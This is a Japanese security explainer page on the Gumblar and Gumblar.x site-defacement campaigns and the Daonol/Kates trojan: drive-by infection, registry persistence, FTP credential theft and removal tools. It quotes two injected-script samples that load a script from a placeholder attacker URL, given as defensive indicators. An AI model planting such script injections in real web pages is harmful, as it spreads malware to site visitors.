Last Update : 2010/06/xx
2009年5月の正規サイトの改ざん騒動「Gumblar」(ガンブラー)、2009年10〜12月と2010年2月〜の正規サイトの改ざん騒動「Gumblar.x」(Gumblar-x)で、もたらされるコンピュータウイルスが『Daonol』(ダオノル)、『Kates』(カテス)、『Lando』(ランド)、『Infostealer』(インフォスティーラ)などと呼ばれるトロイの木馬です。
ウイルス対策ソフトのメーカーごとに検出名が違いますが、主だったものは下のような感じ〜。
ウイルスはWindows上でのみ動作する実行ファイルで、”パッカー”と呼ばれる実行ファイル圧縮ソフト(UPXやASPack)による圧縮が施されてます。ファイルサイズ(KB単位)は2ケタです。
.
このウイルスの感染手段は、”ドライブバイ・ダウンロード”と呼ばれる脅威です。不正なデータが埋め込まれてしまったページをインターネット閲覧ソフト(Internet Explorer、Firefox、Chrome、Opera)で表示させると、いろいろなソフトウェアの旧バージョンにある脆弱性(ぜいじゃくせい)を突く処理が読み込まれ、ユーザーの意思なぞ全く関係なくウイルスが発動し感染します。
『コンピュータウイルスはウイルス対策ソフト・セキュリティソフトがすべて何とかしてくれるっ!』とか何とか思い込んでる人で、悪用されるソフトウェアのバージョンが古いまま放置してるWindowsパソコン(XP/Vista/7など)が被害を受けることになります。(Mac、Linux、携帯電話、ゲーム機、人体には影響ありません)
ウイルスの発動が成功したら、Windowsのレジストリのパラメータ「midi9」にウイルス本体から吐き出されたDLLファイルのパスが書き込まれます。これにより、パソコンが起動する時にウイルスとしての活動が必ず開始する仕組みになってます。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\
発動から感染までは一瞬の出来事で、処理は基本的に裏側で行われます。確認ダイアログのようなものもないので、ユーザーは感染にまったく気づかない恐れがあります。困ったことに発動するウイルス本体は、攻撃者の手により頻繁に差し替えが行われていて、ウイルス対策ソフト・セキュリティソフトの検出対応は後手後手の形でほとんど追いついていません。(ーー
 |
 |
 |
◆ 裏世界でお金になるFTPアカウント情報
このウイルスの第一の機能は、ネットワークを監視してFTPの転送情報をモニタリングすることです。これによりホームページの更新で使われるアカウント情報(パスワードやユーザーID)がウイルス攻撃者の手に渡ってしまい、その情報を元に不正なデータがホームページに埋め込まれます。そのページを見てしまった人がこのウイルスに感染し・・・、という流れでネズミ算式に被害者が増えていきます。
アカウント情報はホームページの”個人情報”みたいなものなので裏世界(ブラックマーケット)では売買の対象となります。一連の改ざん攻撃で、ウイルス攻撃者の元には不正に入手した情報が”ウン万”の単位で手中に収めていると思われます。
また、アカウント情報を盗む以外に下のような処理も行われます。これらの挙動が一通り行われるわけではなく、頻繁に差し替えられてるDaonol/Katesウイルスの検体ごとに違います。
.
一般のホームページが改ざんされた結果、挿入される不正なコードは”JavaScript”です。HTMLファイル(*.html;*.htm)、PHPファイル(*.php)、外部JavaScriptファイル(*.js)が改ざん対象になります。HTMLファイルの例です。
<script src=http://[URL Address]/[File Name].php ></scipt><body 〜
JavaScriptファイルの例です。HTMLファイルと違って、ファイルの最後尾に次の1行がどんどん追加されていきます。
document.write('<script src=http://[URL Address]/[File Name].php ><\/script>');
.
「Gumblar.x」によって発動するDaonol/Katesウイルス専用の駆除ツールです。ちなみに、2010年になってニュースなどではサイトの改ざん騒動すべてを「ガンブラーウイルス」として報じてますが、いわゆる「8080」の改ざん攻撃(被害例 : JR東日本、ホンダ、モロゾフ、ハウス食品、ローソン)によってもたらされるウイルス(Bredolab)とはぜんぜん別物です。
| 改ざん攻撃名 | Gumblar (GENOウイルス) |
Gumblar.x | 8080 (Gumblar.8080/ru:8080/Pegel) |
| 活動期間 | 2009年4〜5月 | 2009年10〜12月 2010年2月〜 |
2009年12月〜 (国内での被害が特に顕著になった時期) |
| 改ざんコード位置 | BODYタグの直前 | ページ最下部 | |
| 攻撃コード | - | 画像 | 画像1、画像2 |
| 発動ウイルス名 | Daonol / Kates | Bredolab (様々なウイルスをダウンロードしてくるウイルス) |
|
| ウイルス発動場所 (下線が由来) |
zlkon.lv ⇒ gumblar.cn ⇒ murtuz.cn |
改ざん被害サイト | ***.ru:8080、***.at:8080、 ***.com:8080、***.info:8080、 改ざん被害サイト など |
| 主な挙動 | ・ホームページのアカウント情報収集 → ネットワーク監視による奪取 ・セキュリティソフトの動作無効/更新不能 [詳細はMicrosoft Encyclopedia] |
・ホームページのアカウント情報収集 → ネットワーク監視による奪取 → FTPソフトの設定ファイル奪取 ・偽セキュリティソフトの発動 → クレジットカード情報の獲得目的 ・セキュリティソフトの動作無効/更新不能 ・パソコンの乗っ取り → ボットネット化 → 迷惑メール配信台 → DDoS攻撃マシン [詳細はトレンドマイクロ、シマンテック] |
|
で、このGumblar.xによってもたらされるDaonol/Katesウイルスの無料駆除ツール(Windows用)はこちら↓。ちなみに、8080タイプについては、パソコンが乗っ取られて複数の様々なウイルスがもたらされるため専用の駆除ツールは存在しません。
| Daonol/Kates専用駆除ツール - Free Removal Tool | |
| カスペルスキー (Kaspersky) | KatesKiller (English) |
| アンラボ (AhnLab) | v3daonol.exe (English) |
| マカフィー (McAfee) | stinger.exe |
| イーセット (ESET) | ESETDaonolCleaner.exe |
ちなみに、発動するDaonol/Katesウイルスは攻撃者の手によって頻繁に差し替え作業が行なわれてます。攻撃者はちゃんと脳ミソを持った人間なので、差し替えられた検体は有償モノや無料モノに関わらずウイルス対策ソフト・セキュリティソフトを数日間に渡って華麗にスルーします。
このような駆除ツールにお世話になることがないよう事前にできる対策は、ウイルスの発動に悪用されるソフトウェアの脆弱性を解消(最新版に更新)することです。”ドライブバイ・ダウンロード”という脅威は、出来立てホヤホヤの新鮮なウイルスが攻撃者の元から直で送られてくる状態なので、導入してるウイルス対策ソフト・セキュリティソフトがほとんど役に立たないことが多いです。
◇ Gumblar & Daonol Notes
.
¤ 関連 : 無料オンラインスキャン | EICARウイルス | Linux用セキュリティソフト | Mac用セキュリティソフト | セキュリティソフト
.
Copyright © 2013 Kpan. All rights reserved.